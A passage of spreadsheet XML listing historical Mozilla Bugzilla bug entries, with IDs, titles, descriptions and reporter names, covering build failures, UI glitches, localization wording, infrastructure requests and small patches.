This needs a CNAME created in DNS to point bonsai-www at rheet.
We also need to get a separate virtual host block set up for it on rheet (preferably in the domains directory instead of in httpd.conf like a lot of the rest of them are on that box).
Also need to make sure we have redirects in place from all of the old URLs that used to be able to reach it:
http://rheet.mozilla.org/webtools/bonsai/
http://cvs-mirror.mozilla.org/bonsai/</t>
  </si>
  <si>
    <t>FIREFOX-420427</t>
  </si>
  <si>
    <t>The rating star of Recommended Add-ons is looks bad</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9b4pre) Gecko/2008022921 Minefield/3.0b4pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9b4pre) Gecko/2008022921 Minefield/3.0b4pre
Tools -&gt; Add-aons -&gt; Get Add-ons
need change -moz-image-region or image
Reproducible: Always</t>
  </si>
  <si>
    <t>spitfire.kuden</t>
  </si>
  <si>
    <t>CORE-459357</t>
  </si>
  <si>
    <t>Support accessible name computation for SVG</t>
  </si>
  <si>
    <t>I believe we will need to support the title attribute for SVG. Not sure if there are any other attributes that could influence the name (other than ARIA ones).</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-463111</t>
  </si>
  <si>
    <t>retrun function() will cause exceptions thrown by evaluating the function not to be catched by a surrounding try-catch</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 .NET CLR 1.1.4322 .NET CLR 2.0.50727 .NET CLR 3.0.04506.30)
Build Identifier: Rhino HEAD snapshot from 2008-02-05 with token patch
var x = function() {
   throw Some Exception
}
try {
   return x()
} catch (e) {
   logException(e) // will not be reached
}
try {
   var y = x()
   return y
} catch (e) {
   logException(e) // works fine
}
Reproducible: Always
Steps to Reproduce:
1.see pseudo code describing the problem
2.
3.
Actual Results:  
exception has not been catched and propergated up the stack
Expected Results:  
exception should have been catched and handled by the catch-code-block
Can easily be workarounded by asigning the returnvalue to a local variable and returning the variable instead.</t>
  </si>
  <si>
    <t>manfred.andres</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-443003</t>
  </si>
  <si>
    <t>seh_mousedown does not always return a value</t>
  </si>
  <si>
    <t>Warning: function seh_mousedown does not always return a value
Source File: chrome://browser/content/deckbrowser.xml
Line: 283 Column: 19
Source Code:
          }</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-133023</t>
  </si>
  <si>
    <t>[HAVE FIX] nick!ident@host doesn't work quite right</t>
  </si>
  <si>
    <t>I noticed that sometimes the bot doesn't seem to wanna op people if they've been
entered in the IRC hostmask format.  This seems to be becase of a bug in the
call to quotemeta()</t>
  </si>
  <si>
    <t>CORE-168614</t>
  </si>
  <si>
    <t>[ps] TMP TMPDIR TEMP not honored</t>
  </si>
  <si>
    <t>Hello
  It would appear none of the environment variables TMP  TMPDIR TEMP are
honored by Mozilla version 1.0.0.2002052918. It always uses /tmp. I dumped the
environment by editing the run-mozilla.sh script just before it executed
mozilla-bin:
        ## Run the program
        ##
set&gt;/tmp/environ
        $prog ${1+$@}
After launching the /tmp/environ file contained: (relevent variables only:)
TEMP=/home/john/.tmpdir
TMP=/home/john/.tmpdir
TMPDIR=/home/john/.tmpdir
The /home/john/.tmpdir exists and permissions are fine.</t>
  </si>
  <si>
    <t>vdrifter</t>
  </si>
  <si>
    <t>FIREFOX-413094</t>
  </si>
  <si>
    <t>FUEL Application registers unnecessary observers</t>
  </si>
  <si>
    <t>The quite-application and quit-application-granted observers are unnecessarily registered by FUEL Application class.  These observers can be removed.  This change should also affect bug 407963 which is trying to move this code too toolkit.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-392834</t>
  </si>
  <si>
    <t>fix build bustage with --enable-trace-malloc and --enable-libxul</t>
  </si>
  <si>
    <t>Created attachment 277335
patch
The combination of --enable-trace-malloc and --enable-libxul was pretty badly busted when I turned on trace-malloc for the Mac leak test tinderbox which has libxul enabled.
Since there was a LIBXUL_LIBRARY = 1 in tools/trace-malloc/lib/Makefile.in and since trace-malloc used to be part of XPCOM I pushed forward in the trace-malloc-inside-libXUL approach to fixing the bustage and checked in this patch as a bustage fix.  But I'd like after-the-fact review on it.</t>
  </si>
  <si>
    <t>BUGZILLA-175127</t>
  </si>
  <si>
    <t>review: Turn all selected into none selected for efficiency Patch v.2</t>
  </si>
  <si>
    <t>Gervase Markham  has requested review for bug #173571: Turn
all selected into none selected for efficiency attachment #102514: Patch
v.2.
http://bugzilla.mozilla.org/attachment.cgi?id=102514&amp;action=edit
Additional Comments from Requester:
This is a simple 10-line performance fix. The symptoms of this problem occur in
a lot of the mysqld-watcher-killed queries so I'd like to get this in.
Gerv</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-325457</t>
  </si>
  <si>
    <t>Show images in userlist for +q and +a modes</t>
  </si>
  <si>
    <t>I'm going to try making a patch with the required code changes first.
Then we can all argue about what colour blobs to use. )</t>
  </si>
  <si>
    <t>THUNDERBIRD-424098</t>
  </si>
  <si>
    <t>One mail identity that is a substring of another mail identity will make thunderbird fail to idenify the sender of a reply or forward mail</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.12) Gecko/20080222 Firefox/2.0.0.12
Build Identifier: 2.0.0.12
If the user has two identity : aaa@bbb.ccc and ddd.aaa@bbb.ccc.
I.e.: the first identity is a substring of the second one.
Whenever the user want to forward or reply to a mail that has been sent to the second address (ddd.aaa@bbb.ccc) the first address (aaa@bbb.ccc) will also match the search and will be use as the default identity.
Reproducible: Always
Steps to Reproduce:
1.Create two identities (for example : aaa@bbb.ccc and ddd.aaa@bbb.ccc) such that aaa@bbb.ccc is the first in the list of identities.
2.Send a mail to ddd.aaa@bbb.ccc
3.Try to reply to this mail and the From field will be aaa@bbb.ccc.
Actually I tracked the bug and managed to find that the function GetBestIdentity() of the file mozilla/mail/base/content/mailCommands.js was trying to look for the first identity that matches the optionalHint that is the concatenation of To: and Cc: fields of the original mail.
I have managed to solve this bug on my installation :
diff -ru mozilla/mail/base/content/mailCommands.js mozilla/mail/base/content/mailCommands.js
--- mozilla/mail/base/content/mailCommands.js	2007-03-09 22:16:44.000000000 +0100
+++ mozilla/mail/base/content/mailCommands.js	2008-03-20 12:00:22.159234395 +0100
@@ -10511 +10517 @@
       // iterate over all of the identities
       var tempID
+      var stringLength = 0
       for (id = 0 id &lt; identitiesCount ++id) {
         tempID = identities.GetElementAt(id).QueryInterface(Components.interfaces.nsIMsgIdentity)
+	// dump (optionalHint +  ?=  + tempID.email + \n)
         if (optionalHint.indexOf(tempID.email.toLowerCase()) &gt;= 0) {
-          identity = tempID
-          break
+	  // Be carefull the user can have several adresses with the same postfix : aaa.bbb@ccc.ddd and bbb@ccc.ddd
+	  // So we get the longest identity founded
+	  if (stringLength &lt; tempID.email.length) {
+            identity = tempID
+            stringLength = tempID.email.length
+	  }
         }
       }
Conversely to the previous version I don't stop on the first match but I'm looking for the match that has the longest answer (I use the var stringLength). Thus I'm sure that if two identites matches that is the most relevant one that is chosen.</t>
  </si>
  <si>
    <t>touraine</t>
  </si>
  <si>
    <t>FIREFOX-462222</t>
  </si>
  <si>
    <t>getZOrderDOMWindowEnumerator broken on Linux and Mac</t>
  </si>
  <si>
    <t>getZOrderDOMWindowEnumerator seems to be working only on Windows.  We need to adjust the #ifdefs at the following places accordingly:
http://mxr.mozilla.org/mozilla-central/source/browser/base/content/browser.js#4267
http://mxr.mozilla.org/mozilla-central/source/browser/components/nsBrowserContentHandler.js#253</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-494479</t>
  </si>
  <si>
    <t>[preview] Collections should not be shown for incompatible applications</t>
  </si>
  <si>
    <t>These all get the same list of collections:
https://preview.addons.mozilla.org/en-US/firefox/
https://preview.addons.mozilla.org/en-US/thunderbird/
https://preview.addons.mozilla.org/en-US/seamonkey/
https://preview.addons.mozilla.org/en-US/sunbird/
https://preview.addons.mozilla.org/en-US/fennec/
A collection shouldn't be shown if it's incompatible with the application. At minimum collections lacking any add-ons compatible with the application should not be shown. To fully fix this you would want to only show collections with all add-ons compatible with the given application. Showing fully or even partially incompatible collections will easily confuse users.</t>
  </si>
  <si>
    <t>davemgarrett</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-860733</t>
  </si>
  <si>
    <t>Add tmielczarek@mozilla.com to scm_nss group</t>
  </si>
  <si>
    <t>bug 844385 created the NSPR/NSS Mercurial repositories and an scm_nss LDAP group to control access to them. It looks like somehow I didn't get added to this group despite being an NSPR peer and having commit access to the NSPR CVS repository.
bug 844385 comment 0 listed me as one of the group to get access (albeit with my gmail account which is not my LDAP account) but bug 844385 comment 12 appears to have left me out which I assume was just an oversight.
CCing kaie that made that list.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-372041</t>
  </si>
  <si>
    <t>Push the Thunderbird 2 start page out to production</t>
  </si>
  <si>
    <t>Spinning off from Bug 370828.
We're ready for the en-US start page to get pushed out so we can start the localization process.
Here's the URL:
https://www.trunk.stage.mozilla.com/en-US/thunderbird/2.0/start/
Note: the page uses several images and a CSS file so those will need to get pushed as well.</t>
  </si>
  <si>
    <t>FIREFOX-500446</t>
  </si>
  <si>
    <t>Add support for Fennec WinCE 1.0a2</t>
  </si>
  <si>
    <t>We have the binary components for wince and we can drop the minversion to allow weave to install on 1.0a2.
But I can't get weave to correctly install on a touch pro. The staged-xpi appears but no files appear in the final extensions/{340c... directory for weave. There's no extensions.log in the profile directory either.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-267801</t>
  </si>
  <si>
    <t>Works With Text flows out of it's too-narrow container</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041103 Firefox/1.0RC2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041103 Firefox/1.0RC2
In the page at
https://update.mozilla.org/themes/showlist.php?numpg=10&amp;os=windows&amp;version=1.0&amp;submit=Update
the text Works with: 0.9.x - 1.0RC1 below the firefox icon is aligned in a way
such that the text overlaps the table borders.
Reproducible: Always
Steps to Reproduce:
1. Open Firefox.
2. Browse to URL
https://update.mozilla.org/themes/showlist.php?numpg=10&amp;os=windows&amp;version=1.0&amp;submit=Update
Actual Results:  
The text Works with: 0.9.x - 1.0RC1 below the firefox icon is aligned in a way
such that the text overlaps the table borders.
Expected Results:  
The text Works with: 0.9.x - 1.0RC1 below the firefox icon should be aligned
in a way such that the text does not overlap the table borders.
1.0PR seems to have this problem too.</t>
  </si>
  <si>
    <t>marcst</t>
  </si>
  <si>
    <t>CORE-394413</t>
  </si>
  <si>
    <t>Get rid of MOZ_ENABLE_POSTSCRIPT</t>
  </si>
  <si>
    <t>With cairo we don't have to keep around an entirely seperate postscript gfx backend and we should just get rid of the configure option and remove all the ifdefs associated with it.</t>
  </si>
  <si>
    <t>SEAMONKEY-79397</t>
  </si>
  <si>
    <t>Want F5 to view/reload as per browser</t>
  </si>
  <si>
    <t>This is Win32-specific.
Browser windows reload/refresh when you press F5.
Mail windows don't.
This would apply to messenger message window and alternate layout window.</t>
  </si>
  <si>
    <t>NSS-39483</t>
  </si>
  <si>
    <t>Uninitialized memory read in CERT_GetSSLCACerts()</t>
  </si>
  <si>
    <t>This is a replacement for internal Netscape bug
http://scopus/bugsplat/show_bug.cgi?id=113764
In HCL_1_51
[W] UMR: Uninitialized memory read in CERT_GetSSLCACerts {1 occurrence}
    Reading 4 bytes from 0x03983a8c (4 bytes at 0x03983a8c uninitialized)
    Address 0x03983a8c is 796 bytes into a 2071 byte block at 0x03983770
    Address 0x03983a8c points to a malloc'd block in heap 0x038f0000
    Thread ID: 0xb8
    Error location
        CERT_GetSSLCACerts [pcertdb.c:4728]
        SSL_ConfigSecureServer [sslsecur.c:722]
        prot_ssl_init  [prot_ssl.c:269]
        imap_main      [imapd.c:421]
        service_start  [service_win32.c:107]
        main           [imapd.c:465]
        mainCRTStartup [crtexe.c:338]
    Allocation location
        malloc         [dbgheap.c:129]
        PR_Malloc      [prmem.c:30]
        PL_ArenaAllocate [plarena.c:81]
        PORT_ArenaAlloc [secport.c:112]
        CollectDistNames [pcertdb.c:4661]
        certcallback   [pcertdb.c:4361]
        SEC_TraverseDBEntries [pcertdb.c:4306]
        SEC_TraversePermCerts [pcertdb.c:4393]
        CERT_GetSSLCACerts [pcertdb.c:4710]
        SSL_ConfigSecureServer [sslsecur.c:722]
        prot_ssl_init  [prot_ssl.c:269]
        imap_main      [imapd.c:421]
        service_start  [service_win32.c:107]
        main           [imapd.c:465]
        mainCRTStartup [crtexe.c:338]</t>
  </si>
  <si>
    <t>CORE-69713</t>
  </si>
  <si>
    <t>Remove unwanted #defines SH_IN_FRAMES in docshell</t>
  </si>
  <si>
    <t>subject says it all</t>
  </si>
  <si>
    <t>CORE-311615</t>
  </si>
  <si>
    <t>[FIX]Fix for bug 286491 was a little too aggressive</t>
  </si>
  <si>
    <t>We're reframing the containing block even if an inline child of the block part
of an {ib} split is being reframed.... There's no need to do that -- the inline
child cannot affect whether the split should exist no matter what sort of frame
we create for it after reframing.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-196350</t>
  </si>
  <si>
    <t>cde.ca.gov - Page does not display text lists only the associated scrollbars</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030210
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030210
The above mentioned CDE web page works in Explorer
but in Mozilla I only see a partial page in yellow.
The scrollbars for the selection lists are shown 
but there is no text box....
Reproducible: Always
Steps to Reproduce:
1. Visit www.cde.ca.gov/schooldir with Mozilla and Explorer
2. Notice in Mozilla that elements are missing
3. 
Actual Results:  
Missing text boxes
Expected Results:  
Display text boxes alongside the scrollbars</t>
  </si>
  <si>
    <t>mneilly</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-378529</t>
  </si>
  <si>
    <t>make buildbot auto-install and update configs from CVS</t>
  </si>
  <si>
    <t>Our buildbot installs (both buildmaster and buildslaves) should update from our buildbot CVS vendor import automatically. This includes:
1) the buildbot install itself
2) the master.cfg (and any included files)
For #1 we'll want to check out from cvs.mozilla.org/cvsroot/mozilla/tools/buildbot and run python setup.py install. Buildbot should be shut down before this action and started afterwards.
For #2 we'll probably want a directory checked out (buildbot-configs?) then symlink/copy the needed files into the main buildbot basedir. A buildbot reconfig $basedir needs to be run afterwards (or a SIGHUP).
Things to consider:
* should be done out of band e.g. don't want buildbot updating itself because if we break it we have to fix by hand
* #1 will interrupt running builds nice-to-have would be to check if there are any active builds and wait if so (this may not be realistic on e.g. a master that is constantly busy).
For the purposes of bug 355309 I want to do the simplest thing that could possibly work (thinking e.g. a script in a while() loop waiting for CVS checkins and performing above actions). This script could also be responsible for starting the buildbot process.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-135376</t>
  </si>
  <si>
    <t>radiohamburg.de - navigation frame displays badly blank space in frameset</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:0.9.9+)
Gecko/20020403
BuildID:    2002040314
At the given URL a white rect is visible instead of the navigation buttons. If
you load the navigation frame in a new window you see that the position of the
layer containing the navigation buttons is false.
Reproducible: Always
Steps to Reproduce:
1. Open URL
2. You see the bug described
3.
Expected Results:  Mozilla should show the navigation on the correct position.
I first saw this bug a long time ago (milestone 0.9.7 or so) in Mozilla. But
when I tested the page with Netscape 6.2.2 which is based on Mozilla 0.9.4 the
page is displayed correctly so I assume that somewhere between 0.9.4 and 0.9.7
something broke within Mozilla.</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG_GRAVEYARD-495740</t>
  </si>
  <si>
    <t>Streamline process of following up in the forum</t>
  </si>
  <si>
    <t>From our weekly CSAT data only between six and ten percent of users from live chat follow up in the forum.  Since a lot of chats are not yet resolved when the user is disconnected or closes the browser the process of following up later should be made easier.  Changes that need to be made:
*Transcript e-mails should include links to the CSAT poll and for following up in the forum
*Provide a link to follow up in the forum right after the chat ends
*Include the chat ID in any forum reply so we can collect stats about users who start in Live Chat and continue in the forum.  (A future enhancement would be to allow the user to include the entire transcript)
Additionally bug 481539 will allow helpers to give a CSAT or forum followup link to the user at any time via a canned response.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-337404</t>
  </si>
  <si>
    <t>Path to zip is not saved</t>
  </si>
  <si>
    <t>After the first start of CCK I had specified a wrong path to the zip programm. Now  I recognized that the path is not saved when creating an own extensions directly after the update of the zip path. But if you hit cancel inside the startup window of CCK it will be saved.
The path of the zip programm should be saved every time.
Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 and CCK 1.0</t>
  </si>
  <si>
    <t>CALENDAR-212534</t>
  </si>
  <si>
    <t>Strings in calendar that are out of the locale directory</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 es-ES rv:1.4) Gecko/20030625
Build Identifier: Mozilla/5.0 (X11 U Linux i686 es-ES rv:1.4) Gecko/20030625
The strings out of the locale branch become hardcoded so they should be
un-hardcoded:
In content/calendarManager.js:
  - The string My Calendar for the default calendar that is shown in the UI.
In content/unifinderToDo.js:
  - line 420: titletext = Untitled.
In content/datepicker/calendar.xml:
  - line 355 contains the months of the year.
Maybe there are mor to come
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>DIRECTORY-188247</t>
  </si>
  <si>
    <t>Build LDAP with GCC 3.x on OS/2</t>
  </si>
  <si>
    <t>Derived from Meta bug 177789.  This bug deals specifically with patches to make
LDAP build on OS/2 using GCC 3.0.3.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-305483</t>
  </si>
  <si>
    <t>--enable-canvas cannot be used with --enable-system-cairo</t>
  </si>
  <si>
    <t>while compilation of nsCanvasRenderingContext2D.o the include file cairo.h is
not found if --enable-system-cairo is used:
nsCanvasRenderingContext2D.cpp:79:19: error: cairo.h: No such file or directory
MOZ_CAIRO_CFLAGS and MOZ_CAIRO_LIBS are missing from the compiler call.</t>
  </si>
  <si>
    <t>SEAMONKEY-212244</t>
  </si>
  <si>
    <t>move ExcludeRemoveList to config.ini</t>
  </si>
  <si>
    <t>Patch to bug 210731 will add an ExcludeRemoveList but be hard coded to the
source file.  It needs to be moved to an easier to configure location such as
config.ini.
This allows 3rd party devs who use the installer to easily modify the list.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-521399</t>
  </si>
  <si>
    <t>[de] Master password dialog: typo and improvement(?)</t>
  </si>
  <si>
    <t>Thomas Lendo hat mich angeschrieben mit folgender Mail zu einer Ãœbersetzung im Toolkit:
Hallo Alex
mir ist heut' noch etwas aufgefallen im Master-Passwort-Dialog (Tb2 und
Tb3):
Jetzt steht da:
Bitte stellen Sie sicher dass Sie das Master-Passwort das Sie
festgelegt haben nicht vergessen. Falls Sie das Master-Passwort
vergessen sollten gibt es keine MÃ¶glichkeit an die Daten zu gelangen
die von ihm geschÃ¼tzt werden.
Mein Vorschlag:
Bitte stellen Sie sicher dass Sie das Master-Passwort das Sie
festgelegt haben nicht vergessen. Falls Sie das Master-Passwort
vergessen sollten gibt es keine MÃ¶glichkeit an die Daten zu gelangen
die davon geschÃ¼tzt werden.
In meinem Vorschlag ist nur ein Komma mehr (hinter MÃ¶glichkeit) und
statt von ihm hab ich ein davon eingesetzt.
Das zusÃ¤tzliche Komma mag den schon komplizierten Satz noch
komplizierter erscheinen aber ich glaube der mÃ¼sste dorthin um die
zu-Konstruktion vom restlichen Satz zu trennen.
von ihm hat mir beim Lesen nicht gefallen da es sich auf eine Person
bezogen anhÃ¶rt. davon wÃ¤re neutraler.
mfg
Thomas
--------------------------------------------------------------------
Ich wÃ¼rde den Satz des Entity masterPasswordWarning.label noch weiter Ã¤ndern zu:
Bitte stellen Sie sicher dass Sie dieses Master-Passwort nicht vergessen. Falls Sie das Master-Passwort vergessen sollten gibt es keine MÃ¶glichkeit an die Daten zu gelangen die davon geschÃ¼tzt werden.
Somit wÃ¼rde man das mehrfache verwenden von festgelegt umgehen. Festgelegt findet man schon oberhalb der Eingabefelder im Einleitungssatz (masterPasswordDescription.label).
Es wÃ¤re schÃ¶n wenn wir uns noch vor SM 2.0 und Tb 3.0 dazu einigen kÃ¶nnten.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-527939</t>
  </si>
  <si>
    <t>Shut down rockyourfirefox.com</t>
  </si>
  <si>
    <t>rockyourfirefox.com is currently broken.  Along with bug 527570 this should be shutdown (redirected?) too.</t>
  </si>
  <si>
    <t>SEAMONKEY-37095</t>
  </si>
  <si>
    <t>Make distclean failes: too many args on command line</t>
  </si>
  <si>
    <t>HPUX 10.10
M15 sources
Using GNU rm
Shell: tcsh 6.04.00
Running make distclean fails because the command line is too long. I believe
that the DIST_GARBAGE variable contains too many */Makefiles. Not sure how that
can be fixed.</t>
  </si>
  <si>
    <t>laurent.duperval</t>
  </si>
  <si>
    <t>FIREFOX-405114</t>
  </si>
  <si>
    <t>Does not prompt for saving tabs when shut down although Warn me when closing multiple tabs is checked</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b1) Gecko/2007110904 Firefox/3.0b1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b1) Gecko/2007110904 Firefox/3.0b1
As per subject but add to that I do not get the message asking me whether I would like to save my current tabs. When click to close Firefox closes without prompting me that I am closing multiple tabs. 
Installation on this and my work machine is similar. I don't have this problem with the work machine though. 
Reproducible: Always
Steps to Reproduce:
1. Open Firefox with Multiple tabs
2. Close Firefox it closes straight away. 
3. Report to Bugzilla
Actual Results:  
Firefox closed suddenly instead of asking me whether I want to close as I have multiple tab. 
Expected Results:  
Firefox should prompt me to close.</t>
  </si>
  <si>
    <t>cara_camillie</t>
  </si>
  <si>
    <t>BUGZILLA-224228</t>
  </si>
  <si>
    <t>2.17.5 Documentation</t>
  </si>
  <si>
    <t>Documentation for 2.17.5 based on the CVS tip with the release date set to
2003-10-31.
I can rebuild in case new checkins are made to documentation before 2.17.5 and
I could build a 2.16.4 thing if it's needed.</t>
  </si>
  <si>
    <t>FIREFOX-220975</t>
  </si>
  <si>
    <t>[altss] Style sheet selector does not display No Theme for pages without a base stylesheet (but shows Basic Theme)</t>
  </si>
  <si>
    <t>For pages having alternate stylesheets but where there is no base stylesheet
(eg a lack of a stylesheet without a title attribute) the style sheet selector
does not display 'No Theme' but instead only displays 'Basic Theme' along with
the titles of the other themes on that page. This is incorrect - such pages do
not have a base or basic theme/style to speak of. Moreover selecting 'Basic
Theme' does what 'No Theme' usually does - completely strips all styling from
the page whereas on pages with both 'No Theme' and 'Basic Theme' the latter
just strips the styling of the alternate stylesheets but not that of the
untitled base theme.
At present Asa's blog is an example of such a page. I'm also going to attach a
pair of test cases.</t>
  </si>
  <si>
    <t>davidpjames</t>
  </si>
  <si>
    <t>SEAMONKEY-242301</t>
  </si>
  <si>
    <t>Context menu's objectIsImage is totally bogus (and throws exceptions)</t>
  </si>
  <si>
    <t>There are two issues in this function:
1)  If type is not set you'll get back null and then trying to call indexOf on
    it will throw.
2)  You'd be better off detecting an image by going through
    nsIImageLoadingContent and looking for an actual image hanging off the node.
#1 is extremely bad -- it makes very broken context menus come up (think every
single item enabled).
You can test with the testcase (and patch) in bug 122685</t>
  </si>
  <si>
    <t>ui-design</t>
  </si>
  <si>
    <t>SEAMONKEY-171632</t>
  </si>
  <si>
    <t>man page is not included in RPM</t>
  </si>
  <si>
    <t>A man page was added to mozilla some time ago (see bug 94220) but it does not
seem to be included in RPMs on ftp.mozilla.org</t>
  </si>
  <si>
    <t>SEAMONKEY-175092</t>
  </si>
  <si>
    <t>[FIXr]ctrl+middleclick in body to open selection in new window sends referer</t>
  </si>
  <si>
    <t>major privacy/security and correctness issue.
load a slashdot page in one tab.
select a bugzilla link in another application.
ctrl+middle-click mozilla to load the bugzilla link in a new tab.
bugzilla slashdot blocked page is shown
Some situations we're feeding sites private URLs.
Some situations we're just feeding sites bogus referer data corrupting their
links-in data and confusing them to how we got from the open page to theirs.
Linux 2002101508.</t>
  </si>
  <si>
    <t>BUGZILLA-304699</t>
  </si>
  <si>
    <t>Implement real objects in Flag.pm and FlagType.pm and remove the Flag-Attachment dependency loop</t>
  </si>
  <si>
    <t>Bugzilla::Attachment::query() should call new Bugzilla::Attachment for each
attachment belonging to a given bug and most of the code inside query() should
be moved into new().
Also Flag.pm should not depend on Attachment.pm and we should add a new
GetAttachment() function into Flag.pm itself avoiding the Flag - Attachment
dependency loop as it's done already for Bugzilla::Flag::GetBug().</t>
  </si>
  <si>
    <t>CORE-294638</t>
  </si>
  <si>
    <t>mozilla browser freezes completely</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.2) Gecko/20040803
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.2) Gecko/20040803
I surf to the page the title appears correctly so some of the page clearly is
parsed right. then it freezes completely (all windows) and I have to kill it
using the tasklist (loosing all open windows).
Reproducible: Always
Steps to Reproduce:
1. surf to http://www.indymedia.org.uk/en/newswire/archive1498.html
Actual Results:  
complete freeze for all mozilla windows
Expected Results:  
displayed the webpage</t>
  </si>
  <si>
    <t>THUNDERBIRD-445501</t>
  </si>
  <si>
    <t>Two images on officially branded Thunderbird migration wizard</t>
  </si>
  <si>
    <t>Created attachment 329826
The fix
When I implemented bug 345468 I didn't realise that on Windows and Linux we already had images (why not on Mac? no idea).
Anyway I think the new branding is better than the old as well as re-using what core gives us. So this patch removes the older branding on the migration wizards.
This won't affect 3.0a2 as we should be shipping that unbranded.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-929054</t>
  </si>
  <si>
    <t>SVN-account credentials fail</t>
  </si>
  <si>
    <t>I've been trying to upload files through SVN which used to work fine. Lately I get an error after filing my known LDAP-credentials belonging to w.benes@gmail.com.
Hope someone can resolve this.</t>
  </si>
  <si>
    <t>CORE-358559</t>
  </si>
  <si>
    <t>R_386_PC32 relocations in libxul.so when building on FC6</t>
  </si>
  <si>
    <t>When building on Fedora Core 6 (where our system wrappers stuff works and
where the big gcc visibility bug is fixed) SELinux prevents me from starting
due to the bad type of relocations in libtracemalloc.so and libxul.so.  This
bug covers the problem in libxul.so.
I don't understand this problem yet so if you do feel free to take it but I'm planning to debug it later today.
The problem is a single relocation (as shown by objdump -R libxul.so):
0000de67 R_386_PC32        __cxa_pure_virtual
There are plenty of other relocations for __cxa_pure_virtual of the healthier R_386_32 sort but there's this lonely one relocation that prevents my default build from running with all the SELinux protection enabled.</t>
  </si>
  <si>
    <t>CORE-390767</t>
  </si>
  <si>
    <t>contentEditable is not exposed as editabletext for a11y</t>
  </si>
  <si>
    <t>Try the testcase in Bug 237964
https://bugzilla.mozilla.org/attachment.cgi?id=157048
Use accerciser to verify whether the section accessible has editable or readonly state.
Instead the document frame has editable state it's not correct.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-497522</t>
  </si>
  <si>
    <t>Allow &gt;3 connections from my IP to irc.mozilla.org</t>
  </si>
  <si>
    <t>I'm presently sharing a townhouse with Tom. The two of us have more than three devices with which we use to connect to the IRC server. Both of our main machines are usually connected 24/7 leaving one extra connection for his iphone my 810 our secondary boxes etc. IRC is a handy tool and it's helpful to be able to interact from various boxes at the same time.
I'm asking for an exception to the 3 connection limit for this IP as suggested by reed. The current IP is 96.238.90.202. 
Thanks.</t>
  </si>
  <si>
    <t>grey</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-316133</t>
  </si>
  <si>
    <t>nn-NO / Norwegian Nynorsk</t>
  </si>
  <si>
    <t>Approval: Trademark Review for Norway (nn-NO) Firefox 2.0</t>
  </si>
  <si>
    <t>Hi this bug both affects and blocks nb and nn.
You're using the same search engine plugins and I'd like you to get those to a 
single set using names like bok-no.src. In addition please use the current
amazon-en-GB and there are wrong encodings in amazon bok google qxl yahoo.
That should be macroman not utf-8. (Don't use mac line endings though)
iconv -f utf-8 -t macroman 
is a start if it doesn't work use the charset directive
http://mycroft.mozdev.org/deepdocs/interprettag.html#charset.
In the bookmarks please remove the community links in the personal toolbar 
folder maybe add one (of the two in case of nn) to the mozilla and firefox
folder beneath the mozilla.com and mozilla-europe link. Talking about that
please add a link to http://www.mozilla-europe.org/no/ beneath the mozilla.com
link too (I guess no is ok for nn too).
Ronny please remove the dictionary.com quick search too.
Thanks and please attach patches and request approval-l10n on them.</t>
  </si>
  <si>
    <t>ronnyva</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-92111</t>
  </si>
  <si>
    <t>IMAP: Attachments not fully downloaded (due to incorrect/smaller RFC822.SIZE by MS Exchange gmail and possibly others)</t>
  </si>
  <si>
    <t>Using _both_ Netscape Communicator 4.76 and Mozilla 0.9.2 I have last attachment
in the list truncated (if it's only one attachment than it happens only
sometimes). That happens to all types of attachments (pictures - you can see
them truncated Word documents). Outlook Express views/downloads thouse files
normaly. Same happened in older Communicators (4.7 etc) and Mozillas (M18 I think).
Using Microsoft Exchange 5.5 Build 2653.23 SP4 with default Internet Mail
Service settings.</t>
  </si>
  <si>
    <t>irving</t>
  </si>
  <si>
    <t>saveliev</t>
